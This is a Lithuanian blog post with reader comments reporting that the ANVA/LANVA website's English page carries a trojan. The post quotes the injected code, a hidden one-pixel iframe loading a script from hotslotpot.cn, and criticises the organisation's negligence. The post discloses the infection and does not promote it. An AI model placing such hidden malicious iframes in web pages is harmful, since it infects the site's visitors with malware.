(L)ANVA platina virusus

Šiandien mano antivirusinė aptiko kažką netikėto, mano vienoje iš mėgstamiausių svetainių. Angliškoje  tinklapio versijoje aptiko trojaną (anva.lt/index_en.html tik neikite). Gabaliukas išeities teksto:

<iframe src=”http://hotslotpot.cn/in.cgi?income65″ width=1 height=1 style=”visibility: hidden”>

Ne pirmą kartą matome, kaip ANVA ar LANVA nemoka ir nesupranta skaitmeninio pasaulio. Nesugeba susitvarkyti savo puslapio ir kelia visuomenei grėsmę.

Reikia imtis priemonių, kad tokie tinklapiai, užkrečiantys vartotojus virusais, turėtų būti sustabdyti. Juk tai aiškiai pažeidžia ne tik Lietuvos Respublikos įstatymus, bet kiekvieno vartotojo laisvės teises.

nonick LM’e vienas iš pirmujų pastebėjo šitą virusą, dėkui jam už info.

Įrašo “(L)ANVA platina virusus” komenatarų: 7

  1. Šiaip tai pagal įstatymus jų veiksmus (t.y., kenkėjiškos programinės įrangos platinimą) galima apskųst teisėsaugai (kuri su jais bendradarbiauja) – už tai gresia straipsnis pagal BK.
    Hm. Būtų juokinga, jei nebūtų graudu.

  2. Neiskenciau ir nuejau, AVAST sureagavo zaibiskai, tai matai parazitus skleidzia kovotojai su blogiu…

  3. Pats dabar apturėjau tokį patį virusą. Žinau žinau, neatsinaujinau. Bet realiai tai buvo darbo viską išvalyt kiek ir ko jis pridarė. O naudojant linux nereiktų bijot po tokius vaikščiot :-)

  4. Negauna 3mln litų investicijos wordpressui „pakurti”, dėl to ir svetainė tokiame stovyje. Apmaudu, gautu baudą tai susitvarkytu išsyk.

  5. Jeigu taip ir toliau, tai LANVA iš vis praras autoritetą ir tarp pačių autorių.

Komentavimo galimybė išjungta.